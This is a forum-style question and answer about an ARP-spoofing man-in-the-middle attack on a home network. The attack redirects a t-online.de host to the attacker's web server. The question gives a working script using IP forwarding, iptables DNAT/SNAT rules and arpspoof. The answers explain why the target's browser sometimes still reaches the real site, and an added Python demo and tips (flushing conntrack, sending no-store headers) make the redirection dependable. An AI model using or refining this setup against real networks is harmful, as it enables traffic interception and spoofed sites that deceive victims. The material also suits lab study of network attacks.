I’m trying to do a man-in-the-middle attack on my local network, and I’m trying to replace the navigationshilfe1.t-online.de server with my own server. Later I want to replace a custom service instead of an HTTP service. My current script looks like:
sysctl -w net.ipv4.ip_forward=1          # let the attacker box forward packets between target and gateway
export TARGET=192.168.2.104
export ATTACKER=192.168.2.115
export GATEWAY=192.168.2.1
export SITE=18.104.22.168                # navigationshilfe1.t-online.de
iptables -t nat -F
# divert new port-80 connections destined for $SITE to the attacker's own web server
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -d $SITE -j DNAT --to-destination $ATTACKER:80
# make replies look like they come from $SITE (conntrack already un-translates replies of DNATed connections, so this rule rarely matches)
iptables -t nat -A POSTROUTING -p tcp -s $ATTACKER --source-port 80 -j SNAT --to-source $SITE:80
iptables -t nat -L -n -v                 # show the nat rules and their packet counters
arpspoof -i eth0 -c both -t $TARGET -r $GATEWAY
The problem is that sometimes the web browser of the target shows the real site, and if I refresh the page a few times it shows the fake one, and vice versa. Does anybody know why, or is the connection just bad?
There are a few possibilities:
Note that iptables nat rules only work on the first packet of a connection. Once a connection is established, the internal mapping tables are used.
Browsers re-use connections to save connection setup overhead. So if your browser still has open connections from before you added the rules, requests on those connections will not be diverted.
Another possibility is that you are seeing the effects of caching in the browser. Browsers will often do a “conditional GET”, which only re-downloads the page if the timestamps indicate it has changed since the client last downloaded it.
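To make the answer's two points concrete, here is an added example (my own, not code from the question or the answer): a minimal HTTP/1.1 server and a keep-alive client run against each other on loopback. The page body, the fixed Last-Modified timestamp, and all function names are this example's own assumptions. It shows that consecutive requests from one client arrive over the same TCP connection (the server sees the same client source port, so a NAT rule added in between never gets a "first packet" to act on), and that a conditional GET for an unchanged page is answered with a 304 and no body, so the client keeps displaying whatever copy it already has cached.

```python
"""Added example: keep-alive connection reuse and conditional GET, run offline.
The page, timestamp and names below are constructed for this demo."""
import threading
from email.utils import formatdate, parsedate_to_datetime
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

PAGE = b"<html><body>real site</body></html>"          # constructed sample page
LAST_MODIFIED = formatdate(1_600_000_000, usegmt=True)  # fixed timestamp for the page
SEEN_PORTS = []  # client source port of every request the server handled, in order


class Handler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # persistent connections, like a real web server

    def do_GET(self):
        SEEN_PORTS.append(self.client_address[1])
        ims = self.headers.get("If-Modified-Since")
        if ims and parsedate_to_datetime(ims) >= parsedate_to_datetime(LAST_MODIFIED):
            # Conditional GET and the page is unchanged: 304 with no body.
            # A browser receiving this keeps showing its cached copy.
            self.send_response(304)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Last-Modified", LAST_MODIFIED)
        self.send_header("Content-Length", str(len(PAGE)))
        self.end_headers()
        self.wfile.write(PAGE)

    def log_message(self, *args):
        pass  # keep the demo quiet


def run_demo():
    """Three requests: two on one keep-alive connection, one on a fresh connection."""
    SEEN_PORTS.clear()
    server = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    conn1 = HTTPConnection("127.0.0.1", port)
    conn2 = HTTPConnection("127.0.0.1", port)
    try:
        # 1) plain GET: full page
        conn1.request("GET", "/")
        r1 = conn1.getresponse()
        body1 = r1.read()
        # 2) conditional GET on the SAME TCP connection: 304, empty body
        conn1.request("GET", "/",
                      headers={"If-Modified-Since": r1.getheader("Last-Modified")})
        r2 = conn1.getresponse()
        body2 = r2.read()
        # 3) new TCP connection and no validator: full page again
        conn2.request("GET", "/")
        r3 = conn2.getresponse()
        body3 = r3.read()
    finally:
        conn1.close()
        conn2.close()
        server.shutdown()
        server.server_close()
    return {
        "statuses": [r1.status, r2.status, r3.status],
        "bodies": [body1, body2, body3],
        "ports": list(SEEN_PORTS),
    }


def reused_connection(result):
    """True when the first two requests arrived over the same client socket."""
    p = result["ports"]
    return len(p) == 3 and p[0] == p[1] and p[2] != p[0]


if __name__ == "__main__":
    res = run_demo()
    print("statuses:", res["statuses"])
    print("client ports seen by the server:", res["ports"])
    print("first two requests shared one connection:", reused_connection(res))
```

Run it directly to see the statuses and the source ports. For the setup in the question this suggests two checks, which are my suggestions rather than part of the answer: list existing flows to the real site's address with `conntrack -L` (from conntrack-tools) and clear them, so that the next request is a new connection that hits the nat rules; and have the fake server answer every request with a 200 and `Cache-Control: no-store` instead of honouring If-Modified-Since, because a 304 from the fake server only reconfirms the real page already sitting in the target browser's cache.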